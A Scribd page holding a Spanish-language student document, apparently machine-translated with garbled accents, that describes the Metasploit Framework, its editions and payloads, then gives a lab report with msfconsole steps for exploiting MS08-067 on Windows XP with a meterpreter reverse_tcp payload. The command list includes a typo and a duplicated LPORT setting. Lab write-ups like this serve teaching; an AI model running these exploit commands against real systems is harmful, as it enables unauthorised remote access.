Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd Logo
Cargar

¡Te damos la bienvenida a Scribd!

  • 97 vistas

    Metasploit

    Cargado por

    Jorge Quispe Cutipa
    Metasploit es un proyecto de seguridad que proporciona información sobre vulnerabilidades y herramientas para pruebas de penetración. Su herramienta principal es el Metasploit Framework, que permite combinar exploits con payloads para explotar sistemas remotos. Existen varias interfaces para Metasploit, incluyendo ediciones gratuitas y comerciales que ofrecen funcionalidades adicionales como escaneo de aplicaciones y VPN pivoting.

    Copyright:

    © All Rights Reserved
    Descargue como DOCX, PDF, TXT o lea en línea desde Scribd

    Metasploit

    Cargado por

    Jorge Quispe Cutipa
    97 vistas3 páginas
    Metasploit es un proyecto de seguridad que proporciona información sobre vulnerabilidades y herramientas para pruebas de penetración. Su herramienta principal es el Metasploit Framework, que permite combinar exploits con payloads para explotar sistemas remotos. Existen varias interfaces para Metasploit, incluyendo ediciones gratuitas y comerciales que ofrecen funcionalidades adicionales como escaneo de aplicaciones y VPN pivoting.

    Descripción original:

    metasploit description

    Derechos de autor

    © © All Rights Reserved

    Formatos disponibles

    DOCX, PDF, TXT o lea en línea desde Scribd

    ¿Le pareció útil este documento?

    ¿Este contenido es inapropiado?

    Metasploit es un proyecto de seguridad que proporciona información sobre vulnerabilidades y herramientas para pruebas de penetración. Su herramienta principal es el Metasploit Framework, que permite combinar exploits con payloads para explotar sistemas remotos. Existen varias interfaces para Metasploit, incluyendo ediciones gratuitas y comerciales que ofrecen funcionalidades adicionales como escaneo de aplicaciones y VPN pivoting.

    Copyright:

    © All Rights Reserved
    Descargue como DOCX, PDF, TXT o lea en línea desde Scribd
    Descargar como docx, pdf o txt
    97 vistas3 páginas

    Metasploit

    Cargado por

    Jorge Quispe Cutipa
    Metasploit es un proyecto de seguridad que proporciona información sobre vulnerabilidades y herramientas para pruebas de penetración. Su herramienta principal es el Metasploit Framework, que permite combinar exploits con payloads para explotar sistemas remotos. Existen varias interfaces para Metasploit, incluyendo ediciones gratuitas y comerciales que ofrecen funcionalidades adicionales como escaneo de aplicaciones y VPN pivoting.

    Copyright:

    © All Rights Reserved
    Descargue como DOCX, PDF, TXT o lea en línea desde Scribd
    Descargar como docx, pdf o txt
    Está en la página 1de 3

    METASPLOIT

    El Proyecto Metasploit es un proyecto de seguridad informtica que proporciona informacin


    acerca de las vulnerabilidades de seguridad y ayuda en las pruebas de penetracin y desarrollo de
    IDS firma.
    Su ms conocido sub-proyecto es de cdigo abierto [2] Metasploit Framework, una herramienta
    para el desarrollo y ejecucin de cdigo de explotacin en contra de un equipo de destino remoto.
    Otros sub-proyectos importantes incluyen la base de datos de cdigo de operacin, archivo
    shellcode e investigacin relacionada.
    El Proyecto Metasploit es bien conocida por sus herramientas anti-forenses y de evasin, algunos
    de los cuales se construyen en el marco de Metasploit.


    Metasploit Framework
    Los pasos bsicos para la explotacin de un sistema que utiliza el Marco incluyen:
    o La eleccin y configuracin de un exploit (cdigo que entra en un sistema de destino
    mediante el aprovechamiento de una de sus errores; unos 900 exploits diferentes para
    Windows, Unix / Linux y Mac OS X sistemas estn incluidos);
    o Opcionalmente comprobar si el sistema de destino previsto es susceptible a la explotar
    elegido;
    o La eleccin y configuracin de una carga til (cdigo que se ejecuta en el sistema de
    destino despus de la entrada con xito, por ejemplo, un shell remoto o un servidor VNC);
    o La eleccin de la tcnica de codificacin de modo que el sistema de prevencin de
    intrusiones (IPS) ignora la carga til codificada;
    La ejecucin de la hazaa.
    Este enfoque modular - que permite la combinacin de cualquiera explotar con cualquier carga til
    - es la principal ventaja del Marco. Facilita las tareas de los atacantes, explotar los escritores y los
    escritores de la carga til.
    Metasploit se ejecuta en Unix (incluyendo Linux y Mac OS X) y en Windows. El Metasploit
    Framework se puede extender a utilizar complementos en varios idiomas.
    Para elegir un exploit y la carga til, se necesita un poco de informacin sobre el sistema de
    destino, como la versin del sistema operativo y los servicios de red instalados. Esta informacin
    puede ser obtenida con el escaneo de puertos y fingerprinting OS herramientas como Nmap. Los
    scanners de vulnerabilidades como Nessus NeXpose o pueden detectar las vulnerabilidades del
    sistema de destino. Metasploit puede importar datos de anlisis de vulnerabilidades y comparar
    las vulnerabilidades identificadas a los actuales mdulos de explotar con fines de explotacin
    exacta. [8]
    Metasploit Interfaces
    Hay varias interfaces para Metasploit disponibles. Las ms populares son mantenidas por Rapid7 y
    Estratgico Ciber LLC. [9]
    Metasploit Framework Edition
    La versin gratuita. Contiene una interfaz de lnea de comandos, la importacin de terceros, la
    explotacin manual y bruta manual de forzar. [9]
    Metasploit Community Edition
    En octubre de 2011, Rapid7 lanzado Metasploit Community Edition, una interfaz de usuario
    basada en web gratuito para Metasploit. Metasploit comunitaria se basa en la funcionalidad
    comercial del pago para las ediciones con un conjunto reducido de caractersticas, incluyendo la
    deteccin de redes, la navegacin y la explotacin del mdulo manual. Metasploit Comunidad est
    incluido en el instalador principal.
    Metasploit expreso
    En abril de 2010, Rapid7 lanzado Metasploit Express, una edicin comercial de ncleo abierto para
    los equipos de seguridad que necesitan para verificar vulnerabilidades. Ofrece una interfaz grfica
    de usuario, se integra nmap para el descubrimiento, y agrega fuerza bruta inteligente, as como la
    recopilacin de pruebas automatizadas.
    Metasploit Pro
    En octubre de 2010, Rapid7 aadi Metasploit Pro, una edicin Metasploit comercial-core abierto
    para pruebas de penetracin. Metasploit Pro incluye todas las caractersticas de Metasploit
    Express y aade el escaneo de aplicaciones web y la explotacin, las campaas de ingeniera social
    y VPN pivotante.
    Armitage
    Armitage es una herramienta de gestin de ataque ciberntico grfica para el Proyecto Metasploit
    que visualiza objetivos y recomienda hazaas. Es una herramienta gratuita y abierta de seguridad
    de red de fuente notable por sus contribuciones a la colaboracin del equIPo rojo que permite,
    sesiones compartidas, datos y comunicacin a travs de una nica instancia de Metasploit. [10]
    Las cargas tiles
    Metasploit ofrece muchos tipos de cargas tiles, entre ellos:
    o Shell de comandos permite a los usuarios ejecutar scripts de recoleccin o ejecutar
    comandos arbitrarios contra el husped.
    o Meterpreter permite a los usuarios controlar la pantalla de un dispositivo a travs de VNC
    y para navegar, cargar y descargar archivos.
    o Cargas dinmicas permite a los usuarios para evadir las defensas anti-virus mediante la
    generacin de cargas nicas.

    INFORME
    Prueba de lnea de comandos como ejemplo para exploit ms08_067_netapi para Windows xp
    Comandos a ejecutar
    1. service postsqls start
    2. service metasploit start
    3. msfconsole
    4. use exploit/Windows/smb/ms08_067_netapi
    5. show options
    6. set PAYLOAD windows/meterpreter/reverse_tcp
    7. set LHOST <IP local>
    8. set LPORT <Puerto local de uso>
    9. set RHOST <IP attack>
    10. set LPORT <puerto vulnerabilidad de netapi>
    11. exploit
    Problemas en el proceso
    o comando exploit no funciona,
    o para este problema se verifico que la red de Windows estaba habilitada y Disponible
    (siendo el uso de una mquina virtual existe la posibilidad de una conexin inestable a
    diferencia de una maquina fsica)
    Para el proceso de verificacin se us los siguientes comandos de prueba

    - nmap O sS <IP de Windows>
    - ping <IP de Windows>

    o se puede observar que hay respuesta sin sentido de parte de Windows, para solucionarlo
    se modifica la mquina virtual con 2 interfaces adicionales
    o se realiza la prueba de los comandos nmap y ping con las nuevas interfaces
    o as mostrando resultados , para luego realizar el exploit

    También podría gustarte